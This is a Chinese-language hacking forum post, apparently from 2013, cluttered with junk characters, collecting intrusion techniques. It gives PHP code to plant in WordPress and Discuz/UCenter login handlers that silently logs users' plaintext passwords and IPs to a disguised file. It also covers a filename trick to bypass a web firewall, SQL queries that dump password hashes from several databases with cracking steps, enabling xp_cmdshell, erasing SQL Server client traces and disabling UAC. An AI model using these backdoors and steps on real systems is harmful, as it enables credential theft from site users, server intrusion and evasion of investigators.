$ z: O& }' Z* }1 C& U. \ T0 G当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
& G2 w7 M, J* b5 j- `0 m0 z就是搜索case ‘login’
8 Y: ]2 e. O" y9 M( Q+ z6 G6 a在它下面直接插入即可,记录的密码生成在pwd.txt中,5 d* j0 ~- z- e G9 C$ O: t
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
# ^2 r# |" p! B' W+ D利用II6文件解析漏洞绕过安全狗代码:" ~4 G4 X4 P+ K/ a
;antian365.asp;antian365.jpg
* E4 k9 D% W1 g3 ~* E! l, e
1 y2 L* A3 L; P0 |- ?5 V) R: P( R! C各种类型数据库抓HASH破解最高权限密码!
) z; L3 D2 q* r# q! r1.sql server2000
/ L$ C3 B6 \& I* x7 n2 tSELECT password from master.dbo.sysxlogins where name='sa'$ }0 e0 ~2 Z0 t Y) [7 w+ |9 ^
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341; e- m F Y9 ^$ r
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
! [( K; z& j$ b$ q( F( d' E6 {) \6 v4 H2 m0 a
0×0100- constant header
, H; H5 ?5 H2 }" ?7 L8 _( H34767D5C- salt
0 I5 n9 f% E- G1 v0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash# y6 f0 i1 @% f) n
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
, [9 ] w, ~, A, p( C5 ncrack the upper case hash in ‘cain and abel’ and then work the case sentive hash$ V1 `- r& D- @0 C; k( r2 W! T% Q
SQL server 2005:-
" W7 `5 l" z) b: }SELECT password_hash FROM sys.sql_logins where name='sa'
, I/ m$ _* V. g* f! S2 |: ~- y* |0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
/ {! C5 X3 u8 W0×0100- constant header
- p% M/ _* T- x9 e993BF231-salt
) m& s! @8 y' ~9 ~6 K5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
* O, d. U' g* P# c6 s$ lcrack case sensitive hash in cain, try brute force and dictionary based attacks.
5 w- g/ y" }# @. b
1 \: f1 U& e0 w5 s" `update:- following bernardo’s comments:-
4 P0 U- { a8 Duse function fn_varbintohexstr() to cast password in a hex string.5 A. L/ j' E' t
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
/ b. c; u6 N5 f, e$ \9 f/ t9 {
6 Q" H U7 t/ p. u/ e' yMYSQL:-
$ ?' j; y+ E. h; N; R, \
$ p5 ]5 D7 }# Y# pIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.0 I Y! r/ _' \2 U
1 h9 b0 B4 V; u; ?3 Z' `! z) F1 j4 }*mysql < 4.1' G# S) l& {6 L( |( O$ G
: c' A: v: T" r# |- a" b
mysql> SELECT PASSWORD(‘mypass’);
# o% i! X" }3 R- _: d( |0 X+——————–+6 D# ]) k( W/ Y+ y; z
| PASSWORD(‘mypass’) |8 R" b2 T7 i8 p8 m4 n$ b* C
+——————–+
0 R* ]! P O9 o$ o( [0 `' ], j3 `| 6f8c114b58f2ce9e |
- g4 J( ?+ S! U, R* [9 @+——————–+
0 _! p2 _% ], e0 z+ Y% g6 o, |
: A9 W6 a' f+ _9 D, Q*mysql >=4.1' _3 A) _4 d2 h* r* }% N3 P: u
! U( q9 \8 {7 [/ B
mysql> SELECT PASSWORD(‘mypass’);
6 ]# a7 N+ b7 r# e8 E+——————————————-+2 C! \$ F9 T3 C* v6 [
| PASSWORD(‘mypass’) |
. x1 v# J8 D1 M- J ^7 w- c s+——————————————-+
$ n) v# _, ^, G1 X$ G| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | Z# j1 I- e. C% N# H( j/ b
+——————————————-+
; T" i j$ U7 ^5 x* \5 f* k1 A
0 ^, S, ]( p' r& O0 ~Select user, password from mysql.user
) l1 ?' P/ s- K( `! ~The hashes can be cracked in ‘cain and abel’
! Y( C$ |' _2 M5 u5 Z
, i( Y9 g! F' o1 A$ P5 x7 CPostgres:-
8 @, V& p' k* d/ j. PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
* R M% {; E5 g( h; D4 X2 F8 jselect usename, passwd from pg_shadow;- e0 H1 d$ d6 O9 r
usename | passwd( G" N. e$ `5 K( s
——————+————————————-# o1 }9 {3 `. _
testuser | md5fabb6d7172aadfda4753bf0507ed4396
' m/ I7 g: W2 s9 nuse mdcrack to crack these hashes:-
7 x& J5 p5 j6 h9 z" D+ N8 b$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43960 w0 p! c$ y8 L0 u0 ^% @6 A% L: @
" t4 b [& p: S. A& n0 z( Z% ^; XOracle:-; T/ `% i$ D) I
select name, password, spare4 from sys.user$
( O7 A& l% Z8 y4 dhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g8 a- X+ q" E1 o3 U2 z
More on Oracle later, i am a bit bored….6 T& C4 \6 G" ]. b; l4 p
- j" b: T/ k5 |' w0 M7 q: j+ a% y N
9 a; \8 e- @& S* P2 F. q `
在sql server2005/2008中开启xp_cmdshell2 I, u7 d0 a) R) k+ n
-- To allow advanced options to be changed.
/ |' M# C* [. d5 ?EXEC sp_configure 'show advanced options', 18 b: F- N' a# K
GO* h, ^/ F0 w4 q- ~5 X6 M" _1 A
-- To update the currently configured value for advanced options.
' y% g4 b. R4 ~8 k! F9 t) J5 iRECONFIGURE# D% n. M7 _$ J- }- H
GO
+ ?7 u: A4 U* r; v1 s! r$ y-- To enable the feature.4 E8 {7 p1 r$ W% q) _* V
EXEC sp_configure 'xp_cmdshell', 1% f8 \& I3 z& t8 u
GO
1 B: W+ }' q8 \+ U& `6 v-- To update the currently configured value for this feature.9 d9 }" s* k, {6 M3 q
RECONFIGURE
. F: a: p2 p# I! Z* JGO% s0 K L$ s+ D! W
SQL 2008 server日志清除,在清楚前一定要备份。4 S2 K: s/ `& E. W
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
# c( p8 C% u; c" M& [% c4 g: R. WX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin3 e) S, P A) z; m/ f3 A
2 _6 x+ v; ` t: [3 m% Z Z' R
对于SQL Server 2008以前的版本:8 \- b# p0 [, g+ o
SQL Server 2005:
9 O g8 T, ~3 B v; v7 c4 F删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat5 l1 g; W2 ]) ^3 i$ B& R5 D
SQL Server 2000:
! L6 r: f f& [7 W9 b7 a清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。6 n. D% ~0 B$ B) T; { W
4 @( O6 P( I/ N4 e" g" s" I
本帖最后由 simeon 于 2013-1-3 09:51 编辑4 J, J( ^9 ^4 U" H1 I& U
4 h/ y9 s( H$ h# a, I, [$ N
. ^9 S. B( q# w- d C2 Qwindows 2008 文件权限修改6 X) u& \. v, m
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx9 n" x- A j* N: W2 |
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
V: G& b+ z, j7 U7 U一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,2 P' {$ Z. X! h4 c3 e
; {# t9 I% s* [! z9 m+ L
Windows Registry Editor Version 5.009 i2 L) I- i U# V& m- n2 @8 n
[HKEY_CLASSES_ROOT\*\shell\runas]
8 ~* V. c6 |8 ]4 Y8 {! u% b@="管理员取得所有权"! P# _( w7 I5 J2 U* P2 V
"NoWorkingDirectory"="". k% O9 j K" J3 J. N
[HKEY_CLASSES_ROOT\*\shell\runas\command]. z Y) N! W$ F! k' \$ Q
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
: n8 L" t' r' C0 N- B8 d. R6 d% C"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ s8 D( h0 F0 I# m
[HKEY_CLASSES_ROOT\exefile\shell\runas2]0 U& _/ F8 E* c, r7 V& ^
@="管理员取得所有权"5 I7 o) `0 X. X. Z
"NoWorkingDirectory"=""
9 [$ ^- J1 d4 J4 S% I8 D[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 X: g! N, x4 `9 m3 r, m
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"; p3 A$ S9 w; E7 e: h3 |
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- U$ T0 C+ S2 W% h' F5 q
' k0 c r8 |2 k* `; ?& r% Q$ y8 f% [# M[HKEY_CLASSES_ROOT\Directory\shell\runas]7 L8 }( A- O( g& M7 I# I
@="管理员取得所有权": @8 Y) N. N0 y3 ^: k5 G
"NoWorkingDirectory"=""; H8 B/ j" R2 H! s
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
8 i) Z. R5 g; A% V@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"3 Y: x7 n% X( a
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"& o! f& h v" J7 m$ B e
1 G9 g/ b, b0 K& W2 F$ {
3 ^# Q# ^/ U1 j# V, ]0 {* p8 C$ O& O, Mwin7右键“管理员取得所有权”.reg导入
. u, J$ N+ z, t' q3 A7 [8 t二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
$ Q% L7 t+ d7 I& w( M1 W. I1、C:\Windows这个路径的“notepad.exe”不需要替换
6 }; N. G5 m$ C. l& U2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
8 k! u# U9 H5 M* [3、四个“notepad.exe.mui”不要管" l0 @4 n0 `: i
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 x& B$ A) }" G1 y* C- _
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”- X3 J j0 K/ }7 u+ a
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,/ {3 u5 h( c( P/ P+ R1 q; W" J
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
( {6 z0 Z0 P* T; p* B$ d; R, W5 n7 Ewindows 2008中关闭安全策略:
2 ?9 }: s" }* k" O2 X6 }reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f1 m; |0 @6 l7 [9 `* y& Y9 K
修改uc_client目录下的client.php 在9 N$ n' w# u) x8 v. C; G
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
( U- V; d5 i' W ]下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
+ f# r( N6 e" ?1 f你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw1 R2 O% t# r; {. c1 J" N
if(getenv('HTTP_CLIENT_IP')) {
& Y* F+ h- v& q0 O1 z& q/ U6 I: N$onlineip = getenv('HTTP_CLIENT_IP');
" Z$ c1 v& l1 h; t* d) ~. w- V} elseif(getenv('HTTP_X_FORWARDED_FOR')) {2 i) }% R% l" {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
4 z, C; `4 a* y- o0 }+ ^0 ^. g6 V} elseif(getenv('REMOTE_ADDR')) {8 v9 z& i, G& z5 d0 e" i- Z
$onlineip = getenv('REMOTE_ADDR');
2 p9 d k( Z) b. s' a. K} else {8 \: B y( L7 V* h
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];6 }( e3 z: L; V0 V% Q) o9 V2 R5 |
}
3 e0 _- J9 C, | $showtime=date("Y-m-d H:i:s");
" N b% H4 f' O# ` $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";* Q, E( a+ Q" `# ]9 c
$handle=fopen('./data/cache/csslog.php','a+');
' h: F J5 _/ E. i! z- t $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对